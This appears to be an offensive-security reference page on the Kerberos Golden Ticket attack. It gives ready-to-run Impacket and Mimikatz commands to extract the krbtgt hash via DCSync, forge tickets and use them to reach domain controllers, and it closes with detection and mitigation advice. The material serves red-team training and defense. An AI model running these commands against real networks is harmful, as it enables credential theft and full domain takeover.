Golden Ticket
Overview
A Golden Ticket is a forged Kerberos TGT (Ticket Granting Ticket) created using the krbtgt account's password hash. Since the KDC uses the krbtgt hash to sign all TGTs, possessing this hash allows forging a TGT for any user — including non-existent users — with any group membership. Golden Tickets provide domain-level persistence and survive password resets for all accounts except krbtgt itself.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
Prerequisites
- The
krbtgtaccount's NTLM hash or AES key (obtained via DCSync or NTDS.dit extraction) - Domain SID
- Domain name
Techniques
Obtain krbtgt Hash
# Impacket — DCSync to extract krbtgt hash
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'
# With NTLM hash
impacket-secretsdump '<domain>/<admin>@<dc_ip>' -hashes ':<ntlm_hash>' -just-dc-user 'krbtgt'
# Mimikatz — DCSync
# https://github.com/gentilkiwi/mimikatz
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
Get Domain SID
# Impacket
# https://github.com/fortra/impacket
impacket-lookupsid '<domain>/<user>:<password>@<dc_ip>' 0
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --get-sid
:: PowerShell
(Get-ADDomain).DomainSID.Value
Forge Golden Ticket (Impacket)
# Impacket — create golden ticket
# https://github.com/fortra/impacket
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain> Administrator
# With AES key (stealthier — avoids RC4 downgrade detection)
impacket-ticketer -aesKey <krbtgt_aes256_key> -domain-sid <domain_sid> -domain <domain> Administrator
This creates Administrator.ccache. Use it:
export KRB5CCNAME=Administrator.ccache
# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<domain>/Administrator@<dc_hostname>' -k -no-pass
impacket-secretsdump '<domain>/Administrator@<dc_hostname>' -k -no-pass
Forge Golden Ticket (Mimikatz)
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Create golden ticket and inject into memory
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt
# Create golden ticket and save to file
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ticket:golden.kirbi
# With AES key
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /ptt
After /ptt (pass-the-ticket), use standard tools:
dir \\dc\c$
PsExec.exe \\dc cmd.exe
Golden Ticket Characteristics
- Default forged lifetime: 10 years (Mimikatz default when
/endinis not specified; legitimate Windows TGT default is 10 hours) - Can impersonate any user including non-existent ones (PAC validation improvements since November 2021 patch cycle have reduced this on fully patched DCs)
- Survives all password resets except
krbtgtpassword change - Works across the entire domain
- Group memberships in the ticket are not validated against AD (PAC validation improvements since November 2021 may detect forged PACs on patched DCs)
Detection Methods
Network-Based Detection
- TGS requests without a corresponding TGT request (AS-REQ) to the KDC
- Kerberos tickets with unusually long lifetimes
- Tickets with RC4 encryption in environments that use AES
Host-Based Detection
- Windows Security Event 4769 with ticket encryption type 0x17 (RC4) when AES is the norm
- Event 4624 (logon) for accounts that don't match expected patterns
- Mimikatz execution artifacts
Mitigation Strategies
- Reset krbtgt password twice — invalidates all existing TGTs (must be done twice because AD keeps the current and previous hash)
- Monitor krbtgt usage — alert on DCSync attempts targeting the krbtgt account
- AES-only Kerberos — disable RC4 to detect RC4-based golden tickets
- Short TGT lifetimes — default is 10 hours; shorter lifetimes reduce the window but don't prevent forged tickets
- Protected Users group — prevents certain delegation and forces AES